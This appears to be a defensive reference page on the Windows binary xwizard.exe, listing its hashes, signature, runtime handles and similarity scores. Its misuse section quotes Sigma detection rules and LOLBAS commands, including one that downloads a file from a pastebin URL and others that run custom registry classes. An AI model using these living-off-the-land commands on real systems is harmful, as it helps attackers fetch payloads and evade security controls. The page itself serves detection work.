xwizard.exe

  • File Path: C:\WINDOWS\SysWOW64\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 0DEC562150AE8256902D42F7A2E09E36
SHA1 B16E00DD62DE2DB18EC9D4510994B9987CD3A20C
SHA256 6C5682825FC79C50D3B3E59D032B754F927858AC52F1525EDFE6457E721BB60D
SHA384 A81FA987231446D132D287B01EE1E322AE7A1DF81241DA6FFDE9E04802A26B8145D3CF45872884E127471DD7B15E5A7B
SHA512 3E1177AA800007DE5A98A4185A1ABF37A5C3EF4416FE2E9B9FC35A060012DF2EBFABCD8FA89AE9F45C2301AC216395470BD60A74B4633C6396A2537F5D4BC25D
SSDEEP 1536:r442+9uRA8YaUjDTTcXURDoq4OZZZLlCIib:H2+4GfjD3ckRD68wb
IMP 2790C7AB558A434B97E98BB8BF89657F
PESHA1 EFC4E8818B9D5B7022954E7F74154E9BAFCF9B43
PE256 072339450AE043866C374B191535C09A8118B094F8035756475D0655F613302F

Runtime Data

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(R-D) C:\Windows\SysWOW64\en-US\xwizard.exe.mui File
(RW-) C:\Windows File
(RW-) C:\Windows\SysWOW64 File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22000.120_none_e541a94fcce8ed6d File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme1077709572 Section
\Windows\Theme3461253685 Section

Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\xwizard.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/71
  • VirusTotal Link: https://www.virustotal.com/gui/file/6c5682825fc79c50d3b3e59d032b754f927858ac52f1525edfe6457e721bb60d/detection

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 55
C:\WINDOWS\system32\ComputerDefaults.exe 47
C:\WINDOWS\system32\ComputerDefaults.exe 49
C:\Windows\system32\ComputerDefaults.exe 49
C:\windows\system32\ComputerDefaults.exe 63
C:\Windows\system32\ComputerDefaults.exe 49
C:\Windows\system32\xwizard.exe 50
C:\windows\system32\xwizard.exe 50
C:\Windows\system32\xwizard.exe 49
C:\WINDOWS\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 54
C:\Windows\system32\xwizard.exe 54
C:\windows\SysWOW64\ComputerDefaults.exe 61
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 49
C:\Windows\SysWOW64\ComputerDefaults.exe 60
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 40
C:\Windows\SysWOW64\ComputerDefaults.exe 49
C:\Windows\SysWOW64\ComputerDefaults.exe 49
C:\Windows\SysWOW64\xwizard.exe 60
C:\Windows\SysWOW64\xwizard.exe 65
C:\windows\SysWOW64\xwizard.exe 54
C:\Windows\SysWOW64\xwizard.exe 60
C:\WINDOWS\SysWOW64\xwizard.exe 55

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.